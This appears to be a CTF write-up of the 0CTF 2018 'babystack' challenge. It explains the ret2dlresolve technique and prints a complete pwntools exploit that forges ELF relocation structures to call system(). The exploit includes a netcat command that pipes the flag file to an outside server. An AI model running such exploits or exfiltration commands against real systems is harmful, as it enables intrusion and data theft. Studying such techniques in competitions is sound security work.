0CTF 2018 Quals: Baby Stack - ret2dlresolve

By David Buchanan, 3rd April 2018

There were two files provided with the challenge: linked Linux ELF binary, stripped of symbols.

  • babystack, a 32-bit dynamically
  • pow.py, a simple python program which wraps babystack, requiring a proof-of-work calculation to be performed, and also ensuring that only 0x100 bytes of input can be sent to the program, in a single block, and with stdout+stderr piped to /dev/null.

Download: babystack.tar.gz

The caption for this challenge was "Info leak is no longer required to exploit a stack overflow in 2018."

pwntools checksec

pseudocode of the vulnerable function

The binary has NX, but no stack protections or PIE. Although the vulnerability is a trivial stack overflow, there isn't any immediately useful code we can ROP to, there is no libc provided, and presumably there is ASLR on the host too.

Presumably the proof-of-work requirement was to deter brute-force and timing-based approaches.

With no way to leak a libc address, all of my usual options were exhausted, so I had to come up with something new (new to me, at least!). There was no entry in the PLT for system(), so I thought "why not make one myself?". After rather a lot of searching (I wasn't really sure what to search for), I came across an excellent Phrack article. The whole article is definitely worth reading, but the relevant part here is section 5.

In summary, the technique is to put some fake datastructures onto the heap such that ld.so will do all the work for us, and resolve and call the system() symbol. All we need is an Elf32_Rel and an Elf32_Sym.

And now for my implementation:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/env python2

from pwn import *

elf = ELF("babystack")

# an arbitrary rw location we can use to store our stage2 payload
STAGE2_ADDR = 0x0804ac00
GADGET_LEAVE = 0x080483a8  # leave; ret;

PLT = elf.get_section_by_name(".plt")["sh_addr"]
STRTAB, SYMTAB, JMPREL = map(elf.dynamic_value_by_tag,
	["DT_STRTAB", "DT_SYMTAB", "DT_JMPREL"])

log.info("PLT:    " + hex(PLT))
log.info("STRTAB: " + hex(STRTAB))
log.info("SYMTAB: " + hex(SYMTAB))
log.info("JMPREL: " + hex(JMPREL))

stage1 = "A"*40
stage1 += p32(STAGE2_ADDR-4)  # saved ebp
# ROP ENTRYPOINT:
stage1 += p32(elf.plt["read"])  # read(stdin, stage2, 0x100-0x40)
stage1 += p32(GADGET_LEAVE)  # jump into stage2 ROP
stage1 += p32(0)  # stdin
stage1 += p32(STAGE2_ADDR)
stage1 += p32(0x100-0x40)  # length

# hand-written ROP because we're tight on space.
# no padding needed!
assert(len(stage1) == 0x40)

# placeholder for ROP, will be inserted later once we know some offsets
stage2 = p32(0)*4

# start with some strings we'll need to reference later
stage2_cmd_str = len(stage2)
stage2 += "cat flag | nc 185.122.59.166 1234\0"
# ^^^ It'd be more sensible to put this on the end of the payload, but I kinda
# wanted to show off how flexible my payload generation is - you can change the
# cmd length without anything breaking
stage2_system_str = len(stage2)
stage2 += "system\0"

# 16 byte align, relative to SYMTAB
stage2 += "A"*((SYMTAB-len(stage2))%16)
assert((len(stage2)+STAGE2_ADDR-SYMTAB)%16 == 0)  # sanity check, alignment is hard

# Fake Elf32_Sym
stage2_fake_sym = len(stage2)
stage2 += p32(STAGE2_ADDR+stage2_system_str-STRTAB)  # index of "system" in strtab
stage2 += p32(0x33333333)  # st_value (unused)
stage2 += p32(0x44444444)  # st_size (unused)
stage2 += p32(0)  # st_other & 3 must be 0

# Fake Elf32_Rel
stage2_fake_rel = len(stage2)
stage2 += p32(STAGE2_ADDR+0x100) # arbitrary writable address
r_info = ((stage2_fake_sym+STAGE2_ADDR-SYMTAB)//16)
r_info = (r_info << 8) | 7
stage2 += p32(r_info) # offset of fake sym, reloc type 7=R_386_JMP_SLOT

# stage2 ROP payload
stage2_rop = ""
stage2_rop += p32(PLT)  # plt start
stage2_rop += p32(STAGE2_ADDR+stage2_fake_rel-JMPREL)  # reloc_offset
stage2_rop += p32(0xdeadbeef)  # only reached after system()
stage2_rop += p32(STAGE2_ADDR+stage2_cmd_str)  # argument to system()

# Actually insert the ROP into the payload
stage2 = stage2_rop + stage2[len(stage2_rop):]

payload = stage1 + stage2
log.info(hex(len(payload)) + "/0x100 bytes used.")
payload += "A"*(0x100-len(payload))  # pad to 0x100 bytes

TESTING = False

if TESTING:
	babystack = process("./babystack")
else:
	babystack = remote("202.120.7.202", 6666)
	#babystack = process(["python2", "pow.py"])
	chal = babystack.recvline().strip()
	log.info("Calculating PoW for " + chal)
	sol = 0
	while not sha256sum(chal+p32(sol)).startswith("\0\0\0"):
		sol += 1
	babystack.send(p32(sol))

babystack.send(payload)
babystack.interactive()

The first stage of the payload is the 0x40 bytes read by the vulnerable call to read(). It does some basic ROP to read the secondary payload into a known location on the heap, and then pivots the stack over to the stage2 payload using a leave gadget.

The stage2 ROP calls the function at the beginning of the .plt section. The argument to this function is an index into the relocation table, which is large enough that it ends up pointing to our crafted Elf32_Rel on the heap, as described in the Phrack article.

I completely ignored the part about VERSYM, so either I got lucky or symbol versioning was disabled (I think I got lucky, because most of the nearby heap was zeroes, i.e. a valid version index).

Here's a diagram that hopefully makes it easier to understand what's going on:

*crazy arrows everywhere*

The +SYMTAB label on one of the arrows is a bit of an oversimplification, I was short on space. r_info is first bitshifted 8 bits to the right, before being used as an index into the SYMTAB table (Again, as described in the Phrack article).

Since I still had no way to receive output from the program, I used netcat to send the flag over to my listening server: cat flag | nc 185.122.59.166 1234. The flag was: flag{return_to_dlresolve_for_warming_up}.

Random digression:

While writing this exploit, I realised it could be quite useful to use some kind of constraint solver for payload generation. Imagine if all I needed to do was describe the datastructures needed, and what needed to point to what (and maybe even specify "no \n allowed"), and my entire payload could be generated fully automatically. This would be particularly useful for generating ROP payloads which need to be adjusted due to ASLR - some gadgets may become off-limits if they have a null or \n in their address for example. It would also be useful to add an element of randomness, for generating a unique payload each time.

Maybe such a thing already exists? Either way, it could make an interesting dissertation subject...